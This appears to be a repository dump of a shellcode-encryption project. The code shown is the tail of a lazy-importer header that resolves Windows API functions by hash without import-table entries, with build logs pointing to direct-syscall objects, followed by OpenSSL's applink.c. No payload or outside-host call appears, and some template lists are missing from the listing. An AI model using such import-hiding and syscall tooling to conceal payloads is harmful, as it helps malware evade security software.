366 | _ied_size = ied_data_dir.Size;
367 | }
368 |
369 | LAZY_IMPORTER_FORCEINLINE explicit operator bool() const noexcept
370 | { // true when the export-directory RVA was non-zero, i.e. _ied does not alias _base
371 | return reinterpret_cast(_ied) != _base;
372 | }
373 |
374 | LAZY_IMPORTER_FORCEINLINE size_type size() const noexcept
375 | { // number of named exports
376 | return _ied->NumberOfNames;
377 | }
378 |
379 | LAZY_IMPORTER_FORCEINLINE const char* base() const noexcept { return _base; }
380 | LAZY_IMPORTER_FORCEINLINE const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept
381 | {
382 | return _ied;
383 | }
384 |
385 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept
386 | { // name string of the index-th named export; index is not checked against size()
387 | return reinterpret_cast(
388 | _base + reinterpret_cast(
389 | _base + _ied->AddressOfNames)[index]);
390 | }
391 |
392 | LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept
393 | { // address of the index-th named export: name index -> ordinal table -> function RVA table; no bounds checks
394 | const auto* const rva_table =
395 | reinterpret_cast(_base + _ied->AddressOfFunctions);
396 |
397 | const auto* const ord_table = reinterpret_cast(
398 | _base + _ied->AddressOfNameOrdinals);
399 |
400 | return _base + rva_table[ord_table[index]];
401 | }
402 |
403 | LAZY_IMPORTER_FORCEINLINE bool is_forwarded(
404 | const char* export_address) const noexcept
405 | { // an export whose address lies inside the export directory itself is treated as a forwarder string, not code
406 | const auto ui_ied = reinterpret_cast(_ied);
407 | return (export_address > ui_ied && export_address < ui_ied + _ied_size); // strict bounds on both ends
408 | }
409 | };
410 |
411 | struct safe_module_enumerator { // bounded walk over the load-order module list: stops after one full lap
412 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T;
413 | value_type* value; // entry currently being visited
414 | value_type* head; // entry the walk started on; reaching it again ends the walk
415 |
416 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept
417 | : safe_module_enumerator(ldr_data_entry()) // default: start from the current process's own list
418 | {}
419 |
420 | LAZY_IMPORTER_FORCEINLINE
421 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept
422 | : value(ldr->load_order_next()), head(value) // starts one link past the entry given; load_order_next() is defined outside this excerpt
423 | {}
424 |
425 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept
426 | { // restarts one link past head, so the next() that follows skips that entry as well
427 | value = head->load_order_next();
428 | }
429 |
430 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept
431 | { // advances one link; false once the walk is back at head or the entry has a null DllBase
432 | value = value->load_order_next();
433 |
434 | return value != head && value->DllBase;
435 | }
436 | };
437 |
438 | struct unsafe_module_enumerator { // unbounded walk over the load-order module list: never reports the end
439 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*;
440 | value_type value; // entry currently being visited
441 |
442 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept
443 | : value(ldr_data_entry()) // starts on the first load-order link
444 | {}
445 |
446 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept { value = ldr_data_entry(); }
447 |
448 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept
449 | { // NOTE(review): always true — a loop driven by this only ends when the caller finds a match and returns
450 | value = value->load_order_next();
451 | return true;
452 | }
453 | };
454 |
455 | // Provides the cached lookups on top of the Derived class's get() method.
456 | template // NOTE(review): the template parameter list (it must declare Derived) is missing from this listing
457 | class lazy_base {
458 | protected:
459 | // This function is needed because every templated function
460 | // with different args has its own static buffer
461 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept
462 | { // one function-local static per lazy_base instantiation holds the resolved pointer
463 | static void* value = nullptr;
464 | return value;
465 | }
466 |
467 | public:
468 | template
469 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept
470 | { // forwards to Derived::get(); which template arguments make it "safe" is not recoverable from this listing
471 | return Derived::template get();
472 | }
473 |
474 | template
475 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept
476 | { // resolves once through Derived::get(), then returns the stored pointer on later calls
477 | auto& cached = _cache();
478 | if (!cached) // a failed lookup leaves nullptr, so it is retried on the next call; no synchronization is visible here
479 | cached = Derived::template get();
480 |
481 | return (T)(cached);
482 | }
483 |
484 | template
485 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept
486 | { // forwards to cached(); template arguments are missing from this listing
487 | return cached();
488 | }
489 | };
490 |
491 | template // NOTE(review): the template parameter list (it must declare Hash) is missing from this listing
492 | struct lazy_module : lazy_base> { // finds a loaded module's base address by the hash of its BaseDllName
493 | template
494 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept
495 | { // walks the module list with enumerator type Enum and returns DllBase of the first hash match
496 | Enum e;
497 | do {
498 | if (hash(e.value->BaseDllName) == Hash)
499 | return (T)(e.value->DllBase);
500 | } while (e.next()); // with an enumerator whose next() is always true this loop has no not-found exit
501 | return {};
502 | }
503 |
504 | template
505 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept
506 | { // same search, but over the list reached from a caller-supplied loader entry, using the bounded enumerator
507 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr));
508 | do {
509 | if (hash(e.value->BaseDllName) == Hash)
510 | return (T)(e.value->DllBase);
511 | } while (e.next());
512 | return {}; // no module matched
513 | }
514 |
515 | template
516 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept
517 | { // in() with the result stored in the per-instantiation cache; ldr is ignored once a value is cached
518 | auto& cached = lazy_base>::_cache();
519 | if (!cached)
520 | cached = in(ldr);
521 |
522 | return (T)(cached);
523 | }
524 | };
525 |
526 | template // NOTE(review): the template parameter list (it must declare Hash and T) is missing from this listing
527 | struct lazy_function : lazy_base, T> { // resolves an exported function by name hash from the loader's module list and export tables; calls made this way need no import-table entry
528 | using base_type = lazy_base, T>;
529 |
530 | template
531 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... args) const
532 | { // resolves the function, then calls it with the forwarded arguments; a failed lookup yields a null pointer that is called unchecked
533 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS
534 | return get()(std::forward(args)...); // default: a fresh lookup on every call
535 | #else
536 | return this->cached()(std::forward(args)...);
537 | #endif
538 | }
539 |
540 | template
541 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept
542 | { // searches every enumerated module's export names for Hash and returns the matching export address
543 | // for backwards compatibility.
544 | // Before 2.0 it was only possible to resolve forwarded exports when
545 | // this macro was enabled
546 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS
547 | return forwarded();
548 | #else
549 |
550 | Enum e;
551 |
552 | do {
553 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS
554 | if (!e.value->DllBase || !e.value->FullDllName.Length) // skip entries with no base or an empty full name
555 | continue;
556 | #endif
557 |
558 | const exports_directory exports(e.value->DllBase); // without the hardened checks DllBase is dereferenced unconditionally
559 |
560 | if (exports) {
561 | auto export_index = exports.size();
562 | while (export_index--) // names are scanned from the last index down to 0
563 | if (hash(exports.name(export_index)) == Hash)
564 | return (F)(exports.address(export_index)); // a forwarder entry is returned as-is on this path
565 | }
566 | } while (e.next());
567 | return {};
568 | #endif
569 | }
570 |
571 | template
572 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept
573 | { // like get(), but when the match is a forwarder string it restarts the search for the forwarded module/function pair
574 | detail::win::UNICODE_STRING_T name;
575 | hash_t::value_type module_hash = 0; // 0 means "any module" until a forwarder names one
576 | auto function_hash = Hash;
577 |
578 | Enum e;
579 | do {
580 | name = e.value->BaseDllName;
581 | name.Length -= 8; // get rid of .dll extension (4 wide chars); NOTE(review): assumes Length >= 8 and a 4-character extension
582 |
583 | if (!module_hash || hash(name) == module_hash) {
584 | const exports_directory exports(e.value->DllBase);
585 |
586 | if (exports) {
587 | auto export_index = exports.size();
588 | while (export_index--)
589 | if (hash(exports.name(export_index)) == function_hash) {
590 | const auto addr = exports.address(export_index);
591 |
592 | if (exports.is_forwarded(addr)) {
593 | auto hashes = hash_forwarded(
594 | reinterpret_cast(addr)); // addr points at the forwarder string inside the export directory
595 |
596 | function_hash = hashes.second;
597 | module_hash = hashes.first;
598 |
599 | e.reset(); // restart the module walk with the new target hashes
600 | break; // leaves the name scan; the outer loop then advances with e.next()
601 | }
602 | return (F)(addr);
603 | }
604 | }
605 | }
606 | } while (e.next());
607 | return {};
608 | }
609 |
610 | template
611 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept
612 | { // forwards to forwarded(); template arguments are missing from this listing
613 | return forwarded();
614 | }
615 |
616 | template
617 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept
618 | { // forwarded() with the result stored in the per-instantiation cache
619 | auto& value = base_type::_cache();
620 | if (!value)
621 | value = forwarded();
622 | return (F)(value);
623 | }
624 |
625 | template
626 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept
627 | {
628 | return forwarded_cached();
629 | }
630 |
631 | template
632 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept
633 | { // searches only the module mapped at m; IsSafe (a template parameter not shown in this listing) gates every check below
634 | if (IsSafe && !m)
635 | return {};
636 |
637 | const exports_directory exports((const char*)(m));
638 | if (IsSafe && !exports)
639 | return {};
640 |
641 | for (unsigned long i{};; ++i) { // names are scanned from index 0 upward
642 | if (IsSafe && i == exports.size()) // NOTE(review): without IsSafe the scan has no upper bound and only ends on a match
643 | break;
644 |
645 | if (hash(exports.name(i)) == Hash)
646 | return (F)(exports.address(i));
647 | }
648 | return {};
649 | }
650 |
651 | template
652 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept
653 | { // forwards to in(); template arguments are missing from this listing
654 | return in(m);
655 | }
656 |
657 | template
658 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept
659 | { // in() with the result stored in the per-instantiation cache; m is ignored once a value is cached
660 | auto& value = base_type::_cache();
661 | if (!value)
662 | value = in(m);
663 | return (F)(value);
664 | }
665 |
666 | template
667 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept
668 | {
669 | return in_cached(m);
670 | }
671 |
672 | template
673 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept
674 | { // searches only the second load-order entry; presumably ntdll, going by the name — its identity is not checked here
675 | return in(ldr_data_entry()->load_order_next()->DllBase);
676 | }
677 |
678 | template
679 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept
680 | { // nt() routed through in_safe()
681 | return in_safe(ldr_data_entry()->load_order_next()->DllBase);
682 | }
683 |
684 | template
685 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept
686 | { // nt() routed through in_cached()
687 | return in_cached(ldr_data_entry()->load_order_next()->DllBase);
688 | }
689 |
690 | template
691 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept
692 | { // nt() routed through in_safe_cached()
693 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase);
694 | }
695 | };
696 |
697 | }
698 | } // namespace li::detail
699 |
700 | #endif // include guard
701 |
--------------------------------------------------------------------------------
/aes加密/shellcode.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/shellcode.txt
--------------------------------------------------------------------------------
/aes加密/test.txt:
--------------------------------------------------------------------------------
1 | Hello World
--------------------------------------------------------------------------------
/aes加密/x64/Debug/Shellcode_AesEncrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/Shellcode_AesEncrypt.obj
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\vc143.pdb
2 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\vc143.idb
3 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\shellcode_aesencrypt.obj
4 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\lazy_importer.obj
5 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\syscalls.obj
6 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\shellcode_aesdecrypt.obj
7 | e:\source code\c_code\shellcode加密\x64\debug\aes加密.exe
8 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.ilk
9 | e:\source code\c_code\shellcode加密\x64\debug\aes加密.pdb
10 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\syscalls-asm.x64.obj
11 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\cl.command.1.tlog
12 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\cl.read.1.tlog
13 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\cl.write.1.tlog
14 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\link.command.1.tlog
15 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\link.read.1.tlog
16 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\link.write.1.tlog
17 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\masm.read.1u.tlog
18 | e:\source code\c_code\shellcode加密\aes加密\x64\debug\aes加密.tlog\masm.write.1u.tlog
19 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Debug\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.ilk
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | lazy_importer.cpp
3 | Shellcode_AesEncrypt.cpp
4 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(58,12): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
5 | 正在生成代码...
6 | aes加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Debug\aes加密.exe
7 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Debug\aes加密.exe" "E:\vcpkg\installed\x64-windows\debug\bin" "x64\Debug\aes加密.tlog\aes加密.write.1u.tlog" "x64\Debug\vcpkg.applocal.log"
8 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Debug|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Debug/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/x64/Debug/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/x64/Debug/vc143.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/vc143.idb
--------------------------------------------------------------------------------
/aes加密/x64/Debug/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Debug/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/x64/Debug/vcpkg.applocal.log:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/Shellcode_AesDecrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/Shellcode_AesDecrypt.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/Shellcode_AesEncrypt.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/Shellcode_AesEncrypt.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.Build.CppClean.log:
--------------------------------------------------------------------------------
1 | e:\source code\c_code\shellcode加密\aes加密\x64\release\vc143.pdb
2 | e:\source code\c_code\shellcode加密\aes加密\x64\release\lazy_importer.obj
3 | e:\source code\c_code\shellcode加密\aes加密\x64\release\shellcode_aesdecrypt.obj
4 | e:\source code\c_code\shellcode加密\aes加密\x64\release\syscalls.obj
5 | e:\source code\c_code\shellcode加密\aes加密\x64\release\shellcode_aesencrypt.obj
6 | e:\source code\c_code\shellcode加密\x64\release\aes加密.exe
7 | e:\source code\c_code\shellcode加密\x64\release\aes加密.pdb
8 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.iobj
9 | e:\source code\c_code\shellcode加密\aes加密\x64\release\syscalls-asm.x64.obj
10 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.ipdb
11 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\cl.command.1.tlog
12 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\cl.read.1.tlog
13 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\cl.write.1.tlog
14 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\link.command.1.tlog
15 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\link.read.1.tlog
16 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\link.write.1.tlog
17 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\masm.read.1u.tlog
18 | e:\source code\c_code\shellcode加密\aes加密\x64\release\aes加密.tlog\masm.write.1u.tlog
19 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.exe.recipe:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | E:\Source Code\C_code\shellcode加密\x64\Release\aes加密.exe
6 |
7 |
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.iobj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.iobj
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.ipdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.ipdb
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.log:
--------------------------------------------------------------------------------
1 | cl : 命令行 warning D9025: 正在重写“/sdl”(用“/GS-”)
2 | Shellcode_AesEncrypt.cpp
3 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(50,12): warning C4244: “参数”: 从“time_t”转换到“unsigned int”,可能丢失数据
4 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(62,9): warning C4477: “printf”: 格式字符串“%d”需要类型“int”的参数,但可变参数 1 拥有了类型“size_t”
5 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(62,9): message : 请考虑在格式字符串中使用“%zd”
6 | E:\Source Code\C_code\shellcode加密\aes加密\Shellcode_AesEncrypt.cpp(59,7): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
7 | 正在生成代码
8 | 1 of 143 functions ( 0.7%) were compiled, the rest were copied from previous compilation.
9 | 0 functions were new in current compilation
10 | 0 functions had inline decision re-evaluated but remain unchanged
11 | 已完成代码的生成
12 | aes加密.vcxproj -> E:\Source Code\C_code\shellcode加密\x64\Release\aes加密.exe
13 | E:\vcpkg\scripts\buildsystems\msbuild\vcpkg.targets(228,5): warning : [vcpkg] Failed to gather app local DLL dependencies, program may not run. Set VcpkgApplocalDeps to false in your project file to suppress this warning. PowerShell arguments: -ExecutionPolicy Bypass -noprofile -File "E:\vcpkg\scripts\buildsystems\msbuild\applocal.ps1" "E:\Source Code\C_code\shellcode加密\x64\Release\aes加密.exe" "E:\vcpkg\installed\x64-windows\bin" "x64\Release\aes加密.tlog\aes加密.write.1u.tlog" "x64\Release\vcpkg.applocal.log"
14 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/CL.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/CL.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/CL.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/CL.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/CL.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/CL.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/Masm.read.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/Masm.read.1u.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/Masm.write.1u.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/Masm.write.1u.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/aes加密.lastbuildstate:
--------------------------------------------------------------------------------
1 | PlatformToolSet=v143:VCToolArchitecture=Native64Bit:VCToolsVersion=14.35.32215:TargetPlatformVersion=10.0.22621.0:VcpkgTriplet=x64-windows:
2 | Release|x64|E:\Source Code\C_code\shellcode加密\|
3 |
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/link.command.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/link.command.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/link.read.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/link.read.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.tlog/link.write.1.tlog:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.tlog/link.write.1.tlog
--------------------------------------------------------------------------------
/aes加密/x64/Release/aes加密.vcxproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/aes加密.vcxproj.FileListAbsolute.txt
--------------------------------------------------------------------------------
/aes加密/x64/Release/lazy_importer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/lazy_importer.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/syscalls-asm.x64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/syscalls-asm.x64.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/syscalls.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/syscalls.obj
--------------------------------------------------------------------------------
/aes加密/x64/Release/vc143.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xf555er/ShellcodeEncryption/a8c2b301b4b1b1c987e03963a3c6848fa3177174/aes加密/x64/Release/vc143.pdb
--------------------------------------------------------------------------------
/aes加密/x64/Release/vcpkg.applocal.log:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/rsa加密/applink.c:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright 2004-2021 The OpenSSL Project Authors. All Rights Reserved.
3 | *
4 | * Licensed under the Apache License 2.0 (the "License"). You may not use
5 | * this file except in compliance with the License. You can obtain a copy
6 | * in the file LICENSE in the source distribution or at
7 | * https://www.openssl.org/source/license.html
8 | */
9 |
/*
 * Slot numbers for the pointer table returned by OPENSSL_Applink(): each
 * APPLINK_* value is the array index at which the matching function pointer
 * is stored. Index 0 is not a function slot; the table initialiser places
 * APPLINK_MAX there, and APPLINK_MAX + 1 is the declared table length.
 */
#define APPLINK_STDIN 1
#define APPLINK_STDOUT 2
#define APPLINK_STDERR 3
#define APPLINK_FPRINTF 4
#define APPLINK_FGETS 5
#define APPLINK_FREAD 6
#define APPLINK_FWRITE 7
#define APPLINK_FSETMOD 8
#define APPLINK_FEOF 9
#define APPLINK_FCLOSE 10 /* should not be used */

#define APPLINK_FOPEN 11 /* solely for completeness */
#define APPLINK_FSEEK 12
#define APPLINK_FTELL 13
#define APPLINK_FFLUSH 14
#define APPLINK_FERROR 15
#define APPLINK_CLEARERR 16
#define APPLINK_FILENO 17 /* to be used with below */

/* Descriptor-level (non-FILE) entries. */
#define APPLINK_OPEN 18 /* formally can't be used, as flags can vary */
#define APPLINK_READ 19
#define APPLINK_WRITE 20
#define APPLINK_LSEEK 21
#define APPLINK_CLOSE 22
/* Must be bumped together with any new slot added above. */
#define APPLINK_MAX 22 /* always same as last macro */
35 |
36 | #ifndef APPMACROS_ONLY
37 | # include
38 | # include
39 | # include
40 |
41 | # ifdef __BORLANDC__
42 | /* _lseek in <io.h> is a function-like macro so we can't take its address */
43 | # undef _lseek
44 | # define _lseek lseek
45 | # endif
46 |
/* Return this module's stdin stream as an untyped pointer. */
static void *app_stdin(void)
{
    void *stream = stdin;

    return stream;
}
51 |
/* Return this module's stdout stream as an untyped pointer. */
static void *app_stdout(void)
{
    void *stream = stdout;

    return stream;
}
56 |
